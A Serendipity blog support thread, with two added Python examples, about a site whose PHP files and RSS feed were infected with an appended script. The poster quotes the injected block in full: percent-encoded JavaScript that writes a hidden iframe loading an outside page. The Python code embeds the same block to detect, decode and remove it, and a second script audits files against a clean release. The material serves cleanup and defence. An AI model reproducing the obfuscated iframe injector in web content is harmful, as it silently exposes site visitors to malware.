
Site got code injected in.... RSS Feed not working

Posted: Sat Dec 20, 2008 4:10 am
by Andyman77
OK, I have cleaned up all the files. I believe I have, rather.

I had a lot of files with the following code appended to the end of them,

index.php got hit several times, even with file permissions set to 644!?

Several other files also got hit.

Code:

<!-- o --><Script Language='Javascript'>
<!-- HTML Encryption provided by iWEBTOOL.com -->
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%6C%65%63%68%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</Script><!-- c -->

My RSS feed is now not working, as the code has managed to get into it. You can see it at the URL below.

http://feedvalidator.org/check.cgi?url= ... index.rss2

I would love to know how to clear that one up, as I can't find it in any of the files, and have I looked!

thank you in advance,

Andy
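
The block Andy posted is not encrypted at all: the "HTML Encryption" is a JavaScript unescape() call over a percent-encoded string, so the hidden content is recoverable offline. The following is an added example (not code from the thread or from Serendipity) that decodes the payload, lists every file under a web root carrying the same comment-delimited block, and strips the block in place. It assumes the injection always appears exactly as quoted ("<!-- o -->" ... "<!-- c -->"); a variant with other markers needs its own pattern. Apart from the percent-encoded string, which is the one in the post, the sample tree is constructed.

```python
"""Find, decode and strip the appended <Script> block quoted in the post above.

Added example, not code from the thread or from Serendipity. Assumes the
injection always looks exactly like the comment-delimited block Andy posted.
Files are handled as latin-1 so that cleaning round-trips every byte unchanged.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple
from urllib.parse import unquote

# The whole injected block, from the opening marker comment to the closing one.
INJECT_RE = re.compile(
    r"<!-- o -->\s*<script[^>]*>.*?</script>\s*<!-- c -->",
    re.DOTALL | re.IGNORECASE,
)
# The "encryption" is only JavaScript unescape() over a percent-encoded string.
UNESCAPE_RE = re.compile(r"unescape\(\s*'([^']*)'\s*\)", re.IGNORECASE)
IFRAME_SRC_RE = re.compile(r"""<iframe[^>]*\bsrc=["']([^"']+)["']""", re.IGNORECASE)

# The block as quoted in the post; the percent-encoded string is Andy's, verbatim.
INJECTED_BLOCK = (
    "<!-- o --><Script Language='Javascript'>\n"
    "<!-- HTML Encryption provided by iWEBTOOL.com -->\n"
    "<!--\n"
    "document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F"
    "%70%61%6C%65%63%68%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D"
    "%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61"
    "%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));\n"
    "//-->\n"
    "</Script><!-- c -->"
)

# File types worth scanning in a PHP blog tree (assumption; extend as needed).
SUFFIXES = (".php", ".inc", ".html", ".htm", ".js", ".tpl", ".xml", ".rss2")


def decode_payload(block: str) -> List[str]:
    """Percent-decode the argument of every unescape('...') call in a block."""
    return [unquote(enc) for enc in UNESCAPE_RE.findall(block)]


def iframe_targets(block: str) -> List[str]:
    """URLs that the decoded payload's hidden iframe(s) would load."""
    return [src for html in decode_payload(block) for src in IFRAME_SRC_RE.findall(html)]


def strip_injection(text: str) -> Tuple[str, int]:
    """Remove every injected block; returns (cleaned text, blocks removed)."""
    return INJECT_RE.subn("", text)


def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Map each infected file (path relative to root) to the iframe URLs it carries."""
    hits: Dict[str, List[str]] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SUFFIXES:
            continue
        text = path.read_bytes().decode("latin-1")
        blocks = INJECT_RE.findall(text)
        if blocks:
            rel = path.relative_to(root).as_posix()
            hits[rel] = [url for b in blocks for url in iframe_targets(b)]
    return hits


def clean_tree(root: Path) -> Dict[str, int]:
    """Strip the injection from every hit in place (back the tree up first)."""
    removed: Dict[str, int] = {}
    for rel in scan_tree(root):
        path = root / rel
        cleaned, n = strip_injection(path.read_bytes().decode("latin-1"))
        path.write_bytes(cleaned.encode("latin-1"))
        removed[rel] = n
    return removed


def demo() -> Tuple[Dict[str, List[str]], Dict[str, int], Dict[str, List[str]]]:
    """Constructed sample tree: two infected files and one clean one."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "templates_c").mkdir()
        (root / "index.php").write_text(
            "<?php\nrequire 'serendipity_config.inc.php';\n?>\n" + INJECTED_BLOCK, encoding="latin-1")
        # A compiled template: the block can live here and show up in the feed
        # without appearing in any source file you would normally grep.
        (root / "templates_c" / "feed.tpl.php").write_text(
            "<?xml version='1.0'?><rss>...</rss>\n" + INJECTED_BLOCK, encoding="latin-1")
        (root / "rss.php").write_text("<?php echo 'clean'; ?>\n", encoding="latin-1")
        before = scan_tree(root)
        removed = clean_tree(root)
        after = scan_tree(root)
    return before, removed, after


if __name__ == "__main__":
    print(demo())
```

Run scan_tree() first and read the decoded URLs before cleaning anything; they tell you what the hidden iframe loaded, which is what you need when checking visitors' machines and asking the host to block the destination. Stripping the block only removes the symptom; the access path the attacker used is a separate problem.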

Re: Site got code injected in.... RSS Feed not working

Posted: Sat Dec 20, 2008 3:49 pm
by garvinhicking
Hi!

This is a common hack by a trojan that has your FTP account data. One of the PCs you used to FTP to your site was most probably infected.

First you need to scan all client PCs that had access to your site for that trojan/backdoor and remove it. Only after that should you change all passwords (MySQL, FTP, blog, mail, ...), and then upload a fresh, unmodified Serendipity release version over your blog.

Also delete all files in your templates_c directory.

Regards,
Garvin
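
Uploading a fresh release over the blog only helps if you can then tell what still differs from that release: a core file with something appended, a compiled template left in templates_c, or an extra PHP file the release never shipped. The following is an added example (not code from the thread or from Serendipity) that hashes an unpacked release tree and the live web root and reports modified, added and missing files. It assumes you unpacked the same release version you run into a scratch directory, that "uploads" is the only directory holding site data the release does not ship (adjust data_dirs to your install), and that serendipity_config_local.inc.php is the installer-generated config, so it is not reported as an extra. Both trees in demo() are constructed.

```python
"""Compare a live web root against an unmodified release tree.

Added example, not code from the thread or from Serendipity. Assumptions:
the scratch copy of the release matches the version you run; data_dirs lists
the directories a release does not ship; expected_extra lists files the
installer creates.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large uploads do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root: Path, skip_dirs: Iterable[str] = ()) -> Dict[str, str]:
    """Relative path -> sha256 for every file under root, skipping named top-level dirs."""
    skip = set(skip_dirs)
    out: Dict[str, str] = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        if rel.parts[0] in skip:
            continue
        out[rel.as_posix()] = sha256_file(path)
    return out


def compare(clean: Dict[str, str], live: Dict[str, str]) -> Dict[str, List[str]]:
    """modified: shipped file whose bytes differ; added: file the release does not
    ship; missing: shipped file that is gone from the live tree."""
    return {
        "modified": sorted(p for p in clean if p in live and clean[p] != live[p]),
        "added": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }


def audit(clean_root: Path, live_root: Path,
          data_dirs: Iterable[str] = ("uploads",),
          expected_extra: Iterable[str] = ("serendipity_config_local.inc.php",)) -> Dict[str, List[str]]:
    """Everything left in "added" deserves a look: templates_c contents (delete them,
    as advised above), dotfiles, or PHP files in directories that should hold only images."""
    report = compare(manifest(clean_root), manifest(live_root, skip_dirs=data_dirs))
    extra = set(expected_extra)
    report["added"] = [p for p in report["added"] if p not in extra]
    return report


def demo() -> Dict[str, List[str]]:
    """Constructed release and live trees: one modified core file, two suspicious extras."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "release"), Path(tmp, "htdocs")
        for root in (clean, live):
            (root / "include").mkdir(parents=True)
            (root / "index.php").write_text("<?php\nrequire 'serendipity_config.inc.php';\n")
            (root / "rss.php").write_text("<?php\nrequire 'serendipity_config.inc.php';\n")
            (root / "include" / "functions.inc.php").write_text("<?php\n// core\n")
        # Live-only differences (all constructed):
        with (live / "index.php").open("a") as fh:  # appended block, as in the post
            fh.write("<!-- o --><Script Language='Javascript'>...</Script><!-- c -->\n")
        (live / "templates_c").mkdir()
        (live / "templates_c" / "feed.tpl.php").write_text("<?php /* compiled template */\n")
        (live / "images").mkdir()
        (live / "images" / ".x.php").write_text("<?php /* unknown hidden file */ ?>\n")
        (live / "uploads").mkdir()
        (live / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0")
        (live / "serendipity_config_local.inc.php").write_text("<?php\n// installer-generated\n")
        return audit(clean, live)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Run the audit after the re-upload and again a few days later: if "modified" or "added" fills up again with the same kind of entries, the credentials or the infected client were not actually dealt with, which is the point Garvin makes later in the thread.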

Posted: Sat Jan 03, 2009 6:07 pm
by Andyman77
Hi,

Firstly, Happy New Year and thanks for S9y 1.4.

I had a huge problem with my host: multiple sites got infected with malware; all but 1 of the sites are now clean.

However, my home page is now back up, working and clean.

I was just thinking, with S9y 1.4 and its version checking: is there a way one can encrypt/compress the main core code of s9y so that there is no way for someone to be able to view the source code?

Just wondering.

regards,

Andy

Posted: Sat Jan 03, 2009 7:44 pm
by kleinerChemiker
It is possible to "compile" PHP code, but s9y is open source, so even then you could download the uncompiled code and read it. And of course, security by obscurity is a very bad way to enhance security. Look at Windows: without source code, there is enough malware that takes advantage of bugs in the code.

Posted: Sat Jan 03, 2009 7:49 pm
by Andyman77
You are correct there. Just an idea, spawned through the madness of 2 weeks of intense problems with my hosting company and my websites.


:roll:

Posted: Sat Jan 03, 2009 11:03 pm
by garvinhicking
Hi!
Andyman77 wrote: You are correct there. Just an idea, spawned through the madness of 2 weeks of intense problems with my hosting company and my websites.
You did, like I mentioned, SCAN ALL YOUR PCs? Your recent trouble VERY MUCH emphasizes that one of your PCs might be infected, and that you might go through the same problems again in a few days.

Regards,
Garvin

Posted: Sun Jan 04, 2009 4:29 am
by Andyman77
Hi Garvin,

Yep, I am using ESET Smart Security, did multiple deep scans and found nothing. I changed all my passwords, using KeePass as a generator.

I did find later that there was a 'hidden' FTP account on my hosting server. No idea how that happened.

All appears to be OK now.